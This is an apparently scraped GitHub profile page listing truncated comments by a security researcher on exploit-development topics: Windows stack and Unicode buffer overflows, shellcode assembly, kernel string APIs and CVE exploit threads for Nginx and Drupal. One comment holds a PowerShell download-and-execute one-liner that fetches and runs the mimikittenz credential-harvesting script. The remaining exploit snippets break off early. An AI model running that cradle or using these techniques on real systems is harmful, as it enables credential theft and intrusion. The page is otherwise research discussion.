nixawk

icon location /kernel/

Results 38 comments of nixawk
trafficstars

NO WORK!!!...

@gearcapitan ``` PS C:\Users\test> IEX (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1") PS C:\Users\test> Invoke-mimikittenz ``` or ``` PS C:\Users\test\Desktop> . .\Invoke-mimikittenz.ps1 # double dots PS C:\Users\test\Desktop> Invoke-mimikittenz ```

Stack VS Heap

## Stack ### demo1 ``` #include "stdafx.h" #include int ShowStackLayout(int x, int y) { int z; z = x + y; return z; } int main(int argc, char *argv[]) {...

Stack VS Heap

## StackOverflow Exploitation - vulnerable server - https://github.com/nixawk/pattern ``` // For StackOverflow Exploitation #include "stdafx.h" #include #include #include #include //load windows socket #pragma comment(lib, "wsock32.lib") //Define Return Messages #define SS_ERROR...

Windows Exploits - Unicode Buffer Overflows

- Disable: GS - Disable: /DYNAMICBASE - Disable: /NXCOMPAT ``` #include "stdafx.h" #include #include /* $ ./msfvenom -l encoders Framework Encoders ================== Name Rank Description ---- ---- ----------- cmd/echo good...

Windows Exploits - Unicode Buffer Overflows

## How to create your own shellcode ? ### Compile shellcode ``` C:\Users\debug\AppData\Local\bin\NASM>nasm shellcode.asm -o shellcode.bin ``` ``` [BITS 32] ;[get kernel32 address] xor ebx, ebx ;clear ebx mov ebx,...

[Dev] Windows Kernel - STRING

## RtlInitEmptyUnicodeString && RtlCopyUnicodeString ``` UNICODE_STRING src = RTL_CONSTANT_STRING(L"SOURCE STRING"); UNICODE_STRING dst; WCHAR dst_buf[256]; // Only store 256 bytes. RtlInitEmptyUnicodeString(&dst, dst_buf, 256 * sizeof(WCHAR)); RtlCopyUnicodeString(&dst, &src); ``` ## References 1....

[Dev] Windows Kernel - STRING

## RtlAppendUnicodeToString ``` UNICODE_STRING src = RTL_CONSTANT_STRING(L"SOURCE STRING"); UNICODE_STRING dst; WCHAR dst_buf[256]; // Only store 256 bytes. NTSTATUS ntstatus; RtlInitEmptyUnicodeString(&dst, dst_buf, 256 * sizeof(WCHAR)); RtlCopyUnicodeString(&dst, &src); ntstatus = RtlAppendUnicodeToString(&dst, L"APPEND...

Windows Kernel - User Mode And Kernel Mode

``` kd> vertarget Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible Built by: 2600.xpsp.080413-2111 Machine Name: Kernel base = 0x804d7000 PsLoadedModuleList = 0x80553fc0 Debug session time:...

[Exploit] CVE-2017-7529 / Nginx - Remote Integer Overflow Vulnerability

Thanks @siochs . I will try to review it.

[Exploit] CVE-2018-7600 - drupal: Unsanitized requests allow remote attackers to execute arbitrary code

> Clean URLs Disabled Your server is capable of using clean URLs, but it is not enabled. Using clean URLs gives an improved user experience and is recommended. Enable clean...